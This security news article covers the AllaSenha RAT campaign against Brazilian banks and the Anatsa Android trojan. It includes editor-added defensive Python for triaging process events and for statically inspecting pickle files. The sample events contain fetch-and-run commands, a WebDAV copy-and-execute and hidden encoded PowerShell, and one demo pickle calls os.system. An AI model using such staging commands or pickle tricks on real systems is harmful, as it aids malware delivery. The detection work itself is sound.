Brazilian Banks Targeted by New AllaKore RAT Variant Called AllaSenha

Brazilian banking institutions are the target of a new campaign that distributes a custom variant of the Windows-based AllaKore remote access trojan (RAT) called AllaSenha.

The malware is “specifically aimed at stealing credentials that are required to access Brazilian bank accounts, [and] leverages Azure cloud as command-and-control (C2) infrastructure,” French cybersecurity firm HarfangLab said in a technical analysis.

Targets of the campaign include banks such as Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob, and Sicredi. The initial access vector, although not definitively confirmed, points towards the use of malicious links in phishing messages.

The starting point of the attack is a malicious Windows shortcut (LNK) file that masquerades as a PDF document (“NotaFiscal.pdf.lnk”) hosted on a WebDAV server since at least March 2024. There is also evidence to suggest that the threat actors behind the activity previously abused legitimate services like Autodesk A360 Drive and GitHub to host the payloads.

The LNK file, when launched, executes a Windows command shell that is designed to open a decoy PDF file for the recipient, while simultaneously retrieving a BAT payload named “c.cmd” from the same WebDAV server location.

Dubbed the BPyCode launcher, the file launches a Base64-encoded PowerShell command, which subsequently downloads the Python binary from the official www.python[.]org website in order to execute a Python script codenamed BPyCode.
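The chain described so far (LNK on a WebDAV share, cmd.exe fetching c.cmd, Base64-encoded PowerShell pulling the Python runtime, a loader that later targets mshta.exe) leaves a recognisable trail in process-creation telemetry. The script below is an added example, not HarfangLab's code or anything recovered from the campaign: it decodes PowerShell `-EncodedCommand` payloads (Base64 over UTF-16LE, which is why `base64 -d` alone shows interleaved null bytes) and applies one heuristic per stage to Sysmon-style event ID 1 records. The heuristics, the sample events, the TEST-NET address 203.0.113.10, the python.org download path and the assumption that the in-memory loader runs inside python.exe are all the editor's own, made for illustration.

```python
import base64
import re
from typing import List, Optional, Tuple

# Heuristics derived from the infection chain in the article (editor's own,
# not HarfangLab's detection logic). Field names follow Sysmon event ID 1.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
WEBDAV_RE = re.compile(r"\\\\[^\\\s]+\\davwwwroot\\", re.I)
DOUBLE_EXT_RE = re.compile(r"\.(?:pdf|docx?|xlsx?)\.lnk\b", re.I)
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|start-bitstransfer|\bcurl\b|\bwget\b", re.I)


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if the line has none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # bad padding, odd length, not UTF-16
        return None


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def triage(events: List[dict]) -> List[Tuple[int, str]]:
    """Return (event index, reason) for every event that matches a stage heuristic."""
    findings = []
    for i, ev in enumerate(events):
        image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
        cl = ev["CommandLine"]
        if DOUBLE_EXT_RE.search(cl):
            findings.append((i, "double-extension .lnk posing as a document"))
        if image == "cmd.exe" and WEBDAV_RE.search(cl):
            findings.append((i, "cmd.exe pulling content from a WebDAV share"))
        if image in ("powershell.exe", "pwsh.exe"):
            script = decode_encoded_command(cl) or ""
            if DOWNLOAD_RE.search(script) and "python.org" in script.lower():
                findings.append((i, "encoded PowerShell downloads the Python runtime"))
        if image == "mshta.exe" and parent == "python.exe":
            # Assumption: the in-memory loader executes inside python.exe, so a
            # python.exe -> mshta.exe parent/child pair is the injection target.
            findings.append((i, "mshta.exe spawned by python.exe"))
    return findings


_DAV = r"\\203.0.113.10@80\DavWWWRoot"  # TEST-NET address; constructed, not a real IOC
SAMPLE_EVENTS = [  # constructed Sysmon-style events, not real telemetry
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'explorer.exe "{_DAV}\\NotaFiscal.pdf.lnk"'},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'cmd.exe /c start "" "{_DAV}\\NotaFiscal.pdf" & '
                    f'copy "{_DAV}\\c.cmd" "%TEMP%\\c.cmd" & "%TEMP%\\c.cmd"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "Invoke-WebRequest https://www.python.org/ftp/python/<ver>/python-<ver>-embed-amd64.zip "
         "-OutFile $env:TEMP\\py.zip")},  # placeholder URL, not the campaign's
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Users\u\AppData\Local\Temp\py\python.exe", "CommandLine": "mshta.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users"},  # benign control event
]

if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

Each heuristic on its own is noisy (WebDAV shares and encoded PowerShell both have legitimate uses); the value is in seeing several of them on one host within minutes, in the order the article lays out.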

BPyCode, for its part, functions as a downloader for a dynamic-link library (“executor.dll”) and runs it in memory. The DLL is fetched from one of the domains generated via a domain generation algorithm (DGA).

“Generated hostnames seem to match those that are associated with the Microsoft Azure Functions service, a serverless infrastructure that in this case would allow operators to easily deploy and rotate their staging infrastructure,” the company said.

Specifically, BPyCode retrieves a pickle file that includes three files: a second Python loader script, a ZIP archive containing the PythonMemoryModule package, and another ZIP archive containing “executor.dll.”

The new Python loader script is then launched to load executor.dll, a Borland Delphi-based malware also known as ExecutorLoader, in memory using PythonMemoryModule. ExecutorLoader is primarily tasked with decoding and executing AllaSenha by injecting it into a legitimate mshta.exe process.
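Because the staging file is a pickle, an analyst who reaches for `pickle.load()` to see what is inside runs whatever the stream says to run. The added example below (editor's code, not HarfangLab's, and not the campaign's file format) walks the opcode stream with `pickletools.genops` instead, which never imports or calls anything: it flags the opcodes through which pickle reaches a callable (GLOBAL/STACK_GLOBAL, REDUCE, BUILD and friends) and lists the members of any embedded ZIP blobs. The three-part dict layout, the stand-in loader text and the dummy DLL bytes are constructed assumptions; the malicious sample uses the classic `__reduce__` trick.

```python
import io
import os
import pickle
import pickletools
import zipfile

# Opcodes that make the unpickler import a name or invoke a callable. Any of
# them means the stream can run code the moment it is loaded.
CODE_EXEC_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ",
                 "NEWOBJ_EX", "BUILD", "EXT1", "EXT2", "EXT4"}
STR_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
           "STRING", "BINSTRING", "SHORT_BINSTRING"}
BYTES_OPS = {"BINBYTES", "SHORT_BINBYTES", "BINBYTES8", "BYTEARRAY8"}
ZIP_MAGIC = b"PK\x03\x04"


def inspect_pickle(blob: bytes) -> dict:
    """Static walk of the opcode stream: nothing is imported, called or built."""
    report = {"code_exec_ops": [], "strings": [], "zips": {}}
    for op, arg, pos in pickletools.genops(blob):
        if op.name in CODE_EXEC_OPS:
            report["code_exec_ops"].append((pos, op.name))
        elif op.name in STR_OPS:
            report["strings"].append(arg)
        elif op.name in BYTES_OPS and arg.startswith(ZIP_MAGIC):
            with zipfile.ZipFile(io.BytesIO(arg)) as z:  # only reads the directory
                report["zips"][pos] = z.namelist()
    return report


def is_safe_to_load(blob: bytes) -> bool:
    """True only if the stream is pure data (no opcode that can reach a callable)."""
    return not inspect_pickle(blob)["code_exec_ops"]


def _zip_bytes(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in members.items():
            z.writestr(name, data)
    return buf.getvalue()


def constructed_stage() -> bytes:
    """Constructed stand-in for a three-part staging pickle; layout is assumed."""
    return pickle.dumps({
        "loader.py": "# constructed second-stage loader script\n",
        "pythonmemorymodule.zip": _zip_bytes({"pythonmemorymodule/__init__.py": b"# stub\n"}),
        "executor.zip": _zip_bytes({"executor.dll": b"MZ" + bytes(62)}),  # dummy, not a PE
    }, protocol=4)


class _Constructed:
    """Pickles to a stream that calls os.system when loaded (classic __reduce__ trick)."""
    def __reduce__(self):
        return (os.system, ("echo constructed",))


def constructed_malicious() -> bytes:
    return pickle.dumps(_Constructed(), protocol=4)


if __name__ == "__main__":
    for label, blob in (("stage", constructed_stage()), ("evil", constructed_malicious())):
        r = inspect_pickle(blob)
        print(label, "safe" if is_safe_to_load(blob) else "UNSAFE", r["code_exec_ops"], r["zips"])
```

If the file passes this check and must be loaded, do it under a `pickle.Unpickler` subclass whose `find_class` raises for everything, so a stream that slipped past the opcode list still cannot resolve a callable.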

In addition to stealing online banking account credentials from web browsers, AllaSenha comes with the ability to display overlay windows in order to capture two-factor authentication (2FA) codes and even trick a victim into scanning a QR code to approve a fraudulent transaction initiated by the attackers.

“All AllaSenha samples […] use Access_PC_Client_dll.dll as their original file name,” HarfangLab noted. “This name can notably be found in the KL Gorki project, a banking malware which appears to combine elements of both AllaKore and ServerSocket.”

Further analysis of the source code associated with the initial LNK file and AllaSenha samples has revealed that a Portuguese-speaking user named bert1m is likely linked to the development of the malware, although there is no evidence at this stage to suggest that they are operating the tools as well.

“The threat actors that operate in Latin America appear to be a particularly productive source of cybercrime campaigns,” HarfangLab said.

“While almost exclusively targeting Latin American individuals to steal banking details, these actors often end up compromising computers that are indeed operated by subsidiaries or employees in Brazil, but that belong to companies all around the world.”

The development comes as Forcepoint detailed malspam campaigns distributing another Latin America-focused banking trojan called Casbaneiro (aka Metamorfo and Ponteiro) via HTML attachments with an aim to siphon victims’ financial information.

“The malware distributed via email urges the user to click on the attachment,” security researcher Prashant Kumar said. “The attachment contains malicious code which does a series of activities and leads to data compromise.”

Anatsa Android Banking Trojan Sneaks into Google Play Store

It's not just Windows that has been on the receiving end of banking trojan attacks, for Zscaler ThreatLabz disclosed details of an Android banking malware campaign that made use of decoy applications uploaded to the Google Play store to deliver Anatsa (aka TeaBot and Toddler).

These clean dropper applications pass off as seemingly harmless productivity and utility apps like PDF readers, QR code readers, and translators, and employ an identical infection chain revealed by ThreatFabric earlier this February to retrieve and deploy the malware from a remote server under the guise of an app update to evade detection.

The apps, which have since been taken down by Google, are listed below –

  • com.appandutilitytools.fileqrutility (QR Reader & File Manager)
  • com.ultimatefilesviewer.filemanagerwithpdfsupport (PDF Reader & File Manager)

According to statistics available on Sensor Tower, PDF Reader & File Manager has been installed anywhere between 500 to 1,000 times, while the QR code reader app has had installations in the range of 50,000 to 100,000.

“Once installed, Anatsa exfiltrates sensitive banking credentials and financial information from global financial applications,” researchers Himanshu Sharma and Gajanan Khond said. “It achieves this through the use of overlay and accessibility techniques, allowing it to intercept and collect data discreetly.”

Zscaler said it identified over 90 malicious apps on the Play Store over the past few months that have collectively had more than 5.5 million installations and were used to propagate various malware families like Joker, Facestealer, Anatsa, Coper, and other adware.
